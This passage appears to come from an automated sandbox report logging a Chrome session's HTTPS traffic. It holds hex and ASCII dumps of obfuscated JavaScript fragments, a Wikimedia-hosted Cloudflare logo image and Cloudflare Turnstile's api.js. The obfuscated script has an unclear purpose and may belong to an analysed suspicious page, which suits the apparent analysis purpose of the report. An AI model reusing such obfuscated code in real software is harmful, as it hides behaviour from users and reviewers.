                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 37 29 2c 27 64 61 74 61 27 3a 4c 65 28 5f 30 78 31 39 31 35 38 38 5b 5f 30 78 35 65 31 36 63 63 28 30 78 33 66 38 29 5d 28 30 78 31 29 2c 5f 30 78 34 34 36 62 31 61 29 7d 3a 41 5b 5f 30 78 35 65 39 37 66 36 5d 3f 5f 30 78 31 39 31 35 38 38 5b 5f 30 78 35 65 31 36 63 63 28 30 78 31 65 33 29 5d 3e 30 78 31 3f 7b 27 74 79 70 65 27 3a 41 5b 5f 30 78 35 65 39 37 66 36 5d 2c 27 64 61 74 61 27 3a 5f 30 78 31 39 31 35 38 38 5b 5f 30 78 35 65 31 36 63 63 28 30 78 33 66 38 29 5d 28 30 78 31 29 7d 3a 7b 27 74 79 70 65 27 3a 41 5b 5f 30 78 35 65 39 37 66 36 5d 7d 3a 78 3b 7d 2c 4c 65 3d 28 5f 30 78 33 30 33 38 32 62 2c 5f 30 78 35 37 37 33 61 35 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 32 64 62 35 62 33 3d 61 30 5f 30 78 31 39 39 33 33 32 3b 69 66 28 6b 65 29 7b 69 66
                                                                                                                                                                                                                                Data Ascii: 7),'data':Le(_0x191588[_0x5e16cc(0x3f8)](0x1),_0x446b1a)}:A[_0x5e97f6]?_0x191588[_0x5e16cc(0x1e3)]>0x1?{'type':A[_0x5e97f6],'data':_0x191588[_0x5e16cc(0x3f8)](0x1)}:{'type':A[_0x5e97f6]}:x;},Le=(_0x30382b,_0x5773a5)=>{const _0x2db5b3=a0_0x199332;if(ke){if
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 74 68 69 73 5b 5f 30 78 32 63 62 65 32 34 28 30 78 32 37 62 29 2b 5f 30 78 32 63 62 65 32 34 28 30 78 34 37 34 29 5d 5b 27 70 75 73 68 27 5d 28 5f 30 78 35 34 31 63 34 65 29 2c 74 68 69 73 3b 7d 29 3b 7d 29 3b 7d 2c 43 65 3d 28 5f 30 78 31 35 33 34 32 37 2c 5f 30 78 34 35 65 35 32 35 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 63 61 33 34 62 33 3d 61 30 5f 30 78 31 39 39 33 33 32 2c 5f 30 78 33 36 33 62 65 32 3d 5f 30 78 31 35 33 34 32 37 5b 5f 30 78 63 61 33 34 62 33 28 30 78 34 62 39 29 5d 28 6c 65 29 2c 5f 30 78 32 66 36 64 63 38 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 5f 30 78 32 38 36 38 33 65 3d 30 78 30 3b 5f 30 78 32 38 36 38 33 65 3c 5f 30 78 33 36 33 62 65 32 5b 5f 30 78 63 61 33 34 62 33 28 30 78 31 65 33 29 5d 3b 5f 30 78 32 38 36 38 33 65 2b 2b 29 7b
                                                                                                                                                                                                                                Data Ascii: this[_0x2cbe24(0x27b)+_0x2cbe24(0x474)]['push'](_0x541c4e),this;});});},Ce=(_0x153427,_0x45e525)=>{const _0xca34b3=a0_0x199332,_0x363be2=_0x153427[_0xca34b3(0x4b9)](le),_0x2f6dc8=[];for(let _0x28683e=0x0;_0x28683e<_0x363be2[_0xca34b3(0x1e3)];_0x28683e++){
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 30 78 32 30 38 29 7d 2c 5f 30 78 35 65 63 34 35 37 3d 5f 30 78 65 33 38 65 61 63 5b 5f 30 78 33 36 32 37 66 34 28 30 78 31 38 64 29 5d 3d 3d 3d 5f 30 78 33 36 32 37 66 34 28 30 78 32 32 64 29 26 26 5f 30 78 63 66 39 34 37 66 5b 5f 30 78 33 36 32 37 66 34 28 30 78 34 38 63 29 5d 7c 7c 5f 30 78 34 30 37 32 38 31 2c 5f 30 78 33 39 32 37 61 34 3d 7b 27 6d 6f 75 73 65 64 6f 77 6e 27 3a 5f 30 78 33 36 32 37 66 34 28 30 78 34 31 38 29 2b 27 65 64 27 2c 27 6d 6f 75 73 65 75 70 27 3a 27 6d 6f 75 73 65 52 65 6c 65 61 27 2b 5f 30 78 33 36 32 37 66 34 28 30 78 34 35 62 29 2c 27 6d 6f 75 73 65 77 68 65 65 6c 27 3a 27 6d 6f 75 73 65 57 68 65 65 6c 27 2c 27 74 6f 75 63 68 73 74 61 72 74 27 3a 5f 30 78 33 36 32 37 66 34 28 30 78 34 31 38 29 2b 27 65 64 27 2c 27 74 6f 75
                                                                                                                                                                                                                                Data Ascii: 0x208)},_0x5ec457=_0xe38eac[_0x3627f4(0x18d)]===_0x3627f4(0x22d)&&_0xcf947f[_0x3627f4(0x48c)]||_0x407281,_0x3927a4={'mousedown':_0x3627f4(0x418)+'ed','mouseup':'mouseRelea'+_0x3627f4(0x45b),'mousewheel':'mouseWheel','touchstart':_0x3627f4(0x418)+'ed','tou
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 66 34 28 30 78 32 32 35 29 2b 5f 30 78 33 36 32 37 66 34 28 30 78 32 61 64 29 5d 5b 5f 30 78 33 36 32 37 66 34 28 30 78 34 32 64 29 2b 27 6d 73 27 5d 5b 5f 30 78 33 36 32 37 66 34 28 30 78 34 37 32 29 5d 28 5f 30 78 33 36 32 37 66 34 28 30 78 31 66 61 29 29 2c 27 64 61 74 61 27 3a 5f 30 78 34 35 64 38 37 61 7d 29 3b 7d 7d 7d 5f 30 78 33 62 65 36 62 33 5b 5f 30 78 33 36 32 37 66 34 28 30 78 31 39 36 29 5d 26 26 74 79 70 65 6f 66 20 5f 30 78 33 62 65 36 62 33 5b 5f 30 78 33 36 32 37 66 34 28 30 78 31 39 36 29 5d 21 3d 5f 30 78 33 36 32 37 66 34 28 30 78 31 61 30 29 26 26 28 5f 30 78 31 65 63 37 66 34 5b 30 78 30 5d 7c 3d 30 78 38 30 29 2c 5f 30 78 32 34 34 36 63 35 5b 5f 30 78 33 36 32 37 66 34 28 30 78 32 65 37 29 5d 28 5f 30 78 31 65 63 37 66 34 29 2c 5f
                                                                                                                                                                                                                                Data Ascii: f4(0x225)+_0x3627f4(0x2ad)][_0x3627f4(0x42d)+'ms'][_0x3627f4(0x472)](_0x3627f4(0x1fa)),'data':_0x45d87a});}}}_0x3be6b3[_0x3627f4(0x196)]&&typeof _0x3be6b3[_0x3627f4(0x196)]!=_0x3627f4(0x1a0)&&(_0x1ec7f4[0x0]|=0x80),_0x2446c5[_0x3627f4(0x2e7)](_0x1ec7f4),_


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                23192.168.2.449778185.15.59.2404432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC434OUTGET /wikipedia/commons/thumb/9/94/Cloudflare_Logo.png/1200px-Cloudflare_Logo.png?20211125225208 HTTP/1.1
                                                                                                                                                                                                                                Host: upload.wikimedia.org
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1052INHTTP/1.1 200 OK
                                                                                                                                                                                                                                content-type: image/png
                                                                                                                                                                                                                                content-disposition: inline;filename*=UTF-8''Cloudflare_Logo.png
                                                                                                                                                                                                                                etag: a0b27ae4e940fbf1ec6bdb72da4601e3
                                                                                                                                                                                                                                last-modified: Fri, 13 May 2022 07:55:33 GMT
                                                                                                                                                                                                                                content-length: 39856
                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 15:34:05 GMT
                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                age: 19381
                                                                                                                                                                                                                                x-cache: cp3079 hit, cp3079 miss
                                                                                                                                                                                                                                x-cache-status: hit-local
                                                                                                                                                                                                                                server-timing: cache;desc="hit-local", host;desc="cp3079"
                                                                                                                                                                                                                                strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                x-client-ip: 8.46.123.33
                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC13855INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 06 00 00 00 eb 21 b3 cf 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 07 74 49 4d 45 07 e6 05 0d 07 37 1f 2e 03 be d6 00 00 80 00 49 44 41 54 78 da ec dd 77 b8 65 55 7d ff f1 f7 da fb 9c 73 fb 34 98 4a 9b 3b 85 a1 17 e9 20 1d 01 51 44 50 11 7b 6c b1 c5 de a5 ce 0c a8 18 45 63 9a a6 f7 f6 4b 04 2c d1 a8 31 c6 24 c6 44 a3 a8 68 50 ba 28 1d 86 99 db cf 39 7b 7d 7f 7f 0c 1a 2c 20 03 b7 9d 7b df af e7 39 cf 0c 03 c3 3e f7 b3 cf dd
                                                                                                                                                                                                                                Data Ascii: PNGIHDR!gAMAa cHRMz&u0`:pQ<bKGDCpHYstIME7.IDATxweU}s4J; QDP{lEcK,1$DhP(9{}, {9>
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC16320INData Raw: 3c 61 fc 5b 7f ed 1d 0c 92 26 95 05 96 f4 a0 88 6f 31 7a c9 1a 0a ea 8b 73 ce ef 8c e0 18 bf 47 24 49 92 a4 1d 52 0b e2 c8 2a c2 02 4b d2 a4 72 70 2e 3d 68 e2 fd cf a5 6b c5 8a 5a 15 cd 57 13 3c 03 a8 9b 8a 24 49 92 b4 43 6a 14 b5 a3 53 2a eb 13 e7 2f 33 0d 49 93 c6 02 4b 02 86 37 0d b2 ed 1b 37 33 76 e7 ed 67 47 8e 97 03 03 a6 22 49 92 24 ed b8 a8 aa 5d 52 ad 7b 75 1e 58 61 18 92 26 8d 05 96 e6 bd d1 3f 7d 12 31 31 4e ef de cb 0f 88 c4 eb 80 3d 4c 45 92 24 49 7a ac a3 cc a2 9f 45 bb 9c 12 8b 76 35 0b 49 93 77 68 31 02 cd 77 d5 ad 37 42 77 ef a2 c8 f1 2b 04 4f 34 11 49 92 24 e9 71 48 65 1f f5 de 13 a9 f7 f8 30 24 49 93 c6 02 4b f3 da e8 e6 41 7a ba 52 99 72 75 32 11 cf 37 11 49 92 24 e9 71 8a 2a 45 6b 6c 5d cf af fc cd ea 88 30 0f 49 93 c2 02 4b f3 f7 bc
                                                                                                                                                                                                                                Data Ascii: <a[&o1zsG$IR*Krp.=hkZW<$ICjS*/3IK773vgG"I$]R{uXa&?}11N=LE$IzEv5Iwh1w7Bw+O4I$qHe0$IKAzRru27I$q*Ekl]0IK
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC9681INData Raw: 5f 3e bf df 5d e6 07 70 4b ad e0 76 d2 93 dc b3 1a bb d8 89 f2 39 9e 6c 9f 6e 63 2d b8 31 42 59 f8 5f d6 b2 d8 09 f0 fc e1 8b 8f 2b 29 4b 7f ff 59 2e 63 e1 f0 13 a7 29 4b 98 e6 f8 71 a5 d7 3f 2e 30 9b 17 82 cd 7b 5e ca c2 80 ef 68 e8 d6 2c f2 be f9 21 e1 fc f0 6c fe 3c e7 2d ef 68 c0 d6 1c 17 da 9d 10 f2 2d 12 e8 1d bf 1e a5 39 56 e3 b0 99 f7 be 13 d6 6d e1 3c 4f 0c f4 ca bc 87 72 92 7d e8 64 c7 97 13 e7 53 4e 35 af 05 83 4f 3f af c5 c7 1d 37 be 9c e1 72 80 55 7a 9d 7e e4 bf 77 f5 d8 f3 a3 bf fd 27 19 d7 ce ce 05 4b 93 73 c1 d3 dc e3 91 bf 45 5e 1f 0d aa ba e1 68 1e 47 ff da d4 05 af 17 8e 1b fd 83 71 ee ef b4 27 57 8b 1c 7b 4b 49 8a da 50 9c d5 97 e3 b5 75 30 f3 eb 49 0e 5c b0 00 6b ea 47 6e c9 da 9b 5f 97 c9 87 3e fb da a4 fe 65 1b 01 00 ce 54 39 a3 c1
                                                                                                                                                                                                                                Data Ascii: _>]pKv9lnc-1BY_+)KY.c)Kq?.0{^h,!l<-h-9Vm<Or}dSN5O?7rUz~w'KsE^hGq'W{KIPu0I\kGn_>eT9


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                24192.168.2.449780104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:05 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 47262
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7b3bb5d1a1b-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                                                                                                                                Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                                                                                                                                Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                                                                                                                                                Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                                                                                                                                                Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                                                                                                                                                Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                                                                                                                                                Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                                                                                                                                                Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                                                                                                                                                Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
